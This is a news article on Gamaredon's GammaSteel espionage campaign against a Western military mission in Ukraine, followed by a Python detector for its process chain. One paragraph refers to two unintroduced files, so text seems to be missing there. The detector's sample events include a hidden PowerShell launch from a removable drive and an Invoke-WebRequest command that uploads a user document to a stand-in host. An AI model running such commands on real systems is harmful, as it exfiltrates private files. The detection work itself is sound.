The Russian state-backed hacking group Gamaredon (aka “Shuckworm”) has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives.

Symantec threat researchers say the campaign started in February 2025 and continued until March, with the hackers deploying an updated version of the GammaSteel info-stealing malware to exfiltrate data.

According to the report, initial access to the infected systems was probably achieved via removable drives containing malicious .LNK files, a vector that Gamaredon has used in the past.

The researchers note a change in the threat actor's tactics, including a shift from VBS scripts to PowerShell-based tools, more obfuscation for payloads, and increased use of legitimate services for evasion.

The first handles command and control (C2) communications, resolving the server address using legitimate services and connecting to Cloudflare-protected URLs. The second file handles the spreading mechanism to infect other removable and network drives using LNK files, while also hiding certain folders and system files to conceal the compromise.

Next, Gamaredon used a reconnaissance PowerShell script that can capture and exfiltrate screenshots of the infected device and gather information about installed antivirus tools, files, and running processes.

The final payload used in the observed attacks is a PowerShell-based version of GammaSteel that is stored in the Windows Registry. The malware can steal documents (.DOC, .PDF, .XLS, .TXT) from various locations like Desktop, Documents, and Downloads, confirming Gamaredon’s continuing interest in espionage. Ultimately, the malware uses ‘certutil.exe’ to hash the files and exfiltrates them using PowerShell web requests.

The recent Gamaredon campaign reflects an effort to increase operational stealth and effectiveness despite the threat group’s limited sophistication compared to other Russian state actors. Symantec comments that various incremental but meaningful improvements in the threat group’s TTPs (tactics, techniques, and procedures) elevate the risks it poses to Western networks, especially considering Gamaredon’s unwavering tenacity.

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.
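The behaviours the article attributes to this campaign (a script host launched from a removable drive, certutil.exe used to hash files, and PowerShell web requests used for exfiltration) are all visible in ordinary process-creation telemetry, so a defender can correlate them. The following is an added example written for this page, not code from the article or from Symantec's report: a small Python detector that runs over constructed process-creation events and flags those three behaviours, correlating a certutil hashing run with a PowerShell web request on the same host within a short window. The event field names, the per-host removable-drive mapping, and all sample values are assumptions made for the example.

```python
"""Detect the process chain described in the article over constructed
process-creation events. Example code, not from the article or Symantec."""
import re
from datetime import datetime, timedelta

# Script hosts that a malicious .LNK commonly points at (assumption for the example).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# Command-line fragments that indicate a PowerShell web request.
WEB_MARKERS = ("invoke-webrequest", "invoke-restmethod", "net.webclient", "uploadfile", "downloadstring")
# A PowerShell web request this soon after a certutil -hashfile run is correlated.
CORRELATION_WINDOW = timedelta(minutes=10)

# Assumption: removable-drive letters per host come from separate device-mount
# telemetry; here they are constructed for the example.
REMOVABLE_DRIVES = {"WS01": {"E:"}, "WS02": set()}

# Constructed sample events (not real telemetry). Fields mimic a generic
# process-creation log: timestamp, host, parent image, image, command line.
SAMPLE_EVENTS = [
    {"ts": "2025-03-01T09:00:00", "host": "WS01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -f E:\\EXAMPLE\\launcher.ps1"},
    {"ts": "2025-03-01T09:02:00", "host": "WS01", "parent": "powershell.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\Users\\user\\Documents\\report.pdf SHA256"},
    {"ts": "2025-03-01T09:03:00", "host": "WS01", "parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest -Uri https://example.invalid/u -Method POST -InFile C:\\Users\\user\\Documents\\report.pdf"},
    # Benign admin activity on another host: local script, hash of an installer, web request hours later.
    {"ts": "2025-03-01T10:00:00", "host": "WS02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -f C:\\Scripts\\backup.ps1"},
    {"ts": "2025-03-01T10:05:00", "host": "WS02", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\installers\\setup.msi SHA256"},
    {"ts": "2025-03-01T12:00:00", "host": "WS02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest -Uri https://example.invalid/status"},
]


def parse_ts(value):
    return datetime.fromisoformat(value)


def touches_removable(event):
    """True if the command line or working directory references a drive letter
    that device telemetry reports as removable on this host."""
    letters = REMOVABLE_DRIVES.get(event["host"], set())
    text = (event["cmdline"] + " " + event.get("cwd", "")).upper()
    # Require the letter to start a path (not be the tail of another token).
    return any(re.search(r"(?<![A-Z0-9])" + re.escape(letter.upper()) + r"\\", text) for letter in letters)


def detect(events):
    """Return (rule, host, timestamp) findings in chronological order."""
    findings = []
    last_hashfile = {}  # host -> time of the most recent certutil -hashfile run
    for event in sorted(events, key=lambda e: parse_ts(e["ts"])):
        image = event["image"].lower()
        cmdline = event["cmdline"].lower()
        ts = parse_ts(event["ts"])
        host = event["host"]
        # 1. A script host launched by explorer.exe from a removable drive
        #    (the .LNK initial-access vector the article describes).
        if event["parent"].lower() == "explorer.exe" and image in SCRIPT_HOSTS and touches_removable(event):
            findings.append(("script_host_from_removable_drive", host, event["ts"]))
        # 2. certutil.exe used to hash files (noisy alone; admins use it too).
        if image == "certutil.exe" and "-hashfile" in cmdline:
            findings.append(("certutil_hashfile", host, event["ts"]))
            last_hashfile[host] = ts
        # 3. A PowerShell web request shortly after hashing on the same host:
        #    the hash-then-exfiltrate pattern, which is far less ambiguous.
        if image in {"powershell.exe", "pwsh.exe"} and any(m in cmdline for m in WEB_MARKERS):
            previous = last_hashfile.get(host)
            if previous is not None and ts - previous <= CORRELATION_WINDOW:
                findings.append(("hashfile_then_web_request", host, event["ts"]))
    return findings


if __name__ == "__main__":
    for rule, host, ts in detect(SAMPLE_EVENTS):
        print(f"{ts} {host} {rule}")
```

Run stand-alone, the script reports the three correlated findings on WS01 and only the low-confidence certutil hit on WS02: the benign script ran from a fixed disk, and its web request falls outside the correlation window. The removable-drive check depends on a mapping that real deployments would take from device-mount or USB-insertion telemetry rather than from a hard-coded table.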
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 10 Apr 2025 14:25:18 +0000